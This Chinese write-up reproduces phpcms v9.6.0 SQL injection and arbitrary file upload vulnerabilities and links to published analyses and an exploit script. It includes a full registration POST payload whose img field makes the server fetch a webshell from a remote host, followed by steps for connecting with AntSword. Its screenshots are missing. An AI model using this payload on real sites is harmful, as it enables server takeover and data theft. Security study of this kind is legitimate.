phpcms v9.6.0 sql注入漏洞
漏洞分析详解:http://blog.nsfocus.net/phpcms-v9-6-content-module-sql-injection-vulnerability-analysis/
这里直接利用exp,python脚本来复现漏洞:https://www.cnblogs.com/Spec/p/10844822.html,需要在文件中更改url和语句来使用
暴出库名和表明(由于长度限制而显示不全):
phpcms v9.6.0 文件上传漏洞
漏洞原理分析详解:https://paper.seebug.org/273/
来到注册页面填写信息:
提交并抓包,将内容替换为以下payload:
siteid=1&modelid=11&username=hacker8888&password=hacker&email=hacker8888@163.com&info[content]=<img src=http://xx.xx.xx.xx/xx.txt?.php#.jpg>&dosubmit=1&protocol=
注意:modelid
的值必须为11,否则无法成功,ip可以替换为vps的ip或网址,来上传一句话木马文件。
放包之后得到响应包,可见包含了上传文件的地址:
访问木马地址,执行phpinfo();
成功:
蚁剑成功连接:
参考链接:
http://blog.nsfocus.net/phpcms-v9-6-content-module-sql-injection-vulnerability-analysis/(PHPCMS V9.6 CONTENT模块SQL注入漏洞分析)
https://paper.seebug.org/273/(PHPCMS v9.6.0任意文件上传扩展分析)
https://www.freebuf.com/vuls/131648.html(PHPcms9.6.0最新版任意文件上传扩展)